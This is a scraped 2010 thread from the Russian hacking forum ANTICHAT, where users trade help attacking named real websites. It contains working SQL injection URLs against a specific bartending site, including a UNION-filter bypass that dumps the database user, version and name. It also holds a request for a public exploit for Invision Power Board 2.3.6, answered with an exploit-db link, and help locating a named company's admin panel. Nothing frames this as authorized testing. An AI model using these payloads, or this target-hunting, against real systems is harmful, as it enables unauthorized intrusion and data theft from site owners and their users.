ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.11.2010, 14:54
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073
Репутация:
44
|
|
Сообщение от swat_
swat_ said:
подскажите пожалуйста что это за уязвимость
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//userttool-258-www.bigpoint.net/[/COLOR][/COLOR]
А с чего ты это взял, что это "уязвимость" ?. Прочитай ошибку.
Код:
Code:
Notice: failed to build language-file ut.login in /home/shared/include/XmlLanguageParser/1/XmlLanguageParser.class.php on line 103
|
|
|
13.11.2010, 15:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
Сообщение от JohnnyBGoode
JohnnyBGoode said:
Не знаю даже,помимо колонки password,откуда достал хэш,есть еще колонка hash,но оттуда что-то ничего не выводится
Проверьте:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]select count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]hash[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]from table_name[/COLOR][/COLOR]
Где hash - имя откуда у вас ничего "не выводится"
Если вывело "0", то нету записей.
|
|
|
|
13.11.2010, 21:49
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855
Репутация:
0
|
|
помогите раскрутить скуль, стоит фильтрация на юнион
через name_const не выходит
http://www.thebartend.com/drinks/ShotsShooters/R.php?id=5714%20order%20by%209%20--
|
|
|
|
13.11.2010, 22:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
31258
Репутация:
7
|
|
Сообщение от ALIM
ALIM said:
помогите раскрутить скуль, стоит фильтрация на юнион
через name_const не выходит
http://www.thebartend.com/drinks/ShotsShooters/R.php?id=5714%20order%20by%209%20--
http://www.thebartend.com/drinks/ShotsShooters/R.php?id=5714+and+1=0+union(select+concat_ws(0x3a, user(),version(),database()),2,3,4,5,6,7,8,9)+--+
|
|
|
|
13.11.2010, 22:06
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855
Репутация:
0
|
|
tnx
|
|
|
|
13.11.2010, 22:09
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
вот более простой способ:
http://www.thebartend.com/drinks/ShotsShooters/R.php?id=-5714+/*!UNION*/+SELECT+VERSION(),2,3,4,5,6,7,8,9--
|
|
|
|
14.11.2010, 00:21
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073
Репутация:
44
|
|
Есть ли в паблике рабочий сплоит под Invision Power Board 2.3.6 версии ?
Заранее благодарю.
|
|
|
|
14.11.2010, 00:53
|
|
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
Провел на форуме:
792994
Репутация:
104
|
|
Сообщение от DeepBlue7
DeepBlue7 said:
Есть ли в паблике рабочий сплоит под Invision Power Board 2.3.6 версии ?
Заранее благодарю.
http://www.exploit-db.com/exploits/10304/
|
|
|
|
14.11.2010, 17:39
|
|
Участник форума
Регистрация: 09.11.2008
Сообщений: 206
Провел на форуме:
1638275
Репутация:
539
|
|
Сообщение от svesve
svesve said:
Друзья помогите найти админку
http://loesk.ru/
я уже все перерыл
https://loesk.ru/manager/
|
|
|
|
14.11.2010, 17:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
Сообщение от svesve
svesve said:
Спасибо! но это ISP
а там где-то должна быть панелька управления самой CMS
Не знаю, может быть поможет.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
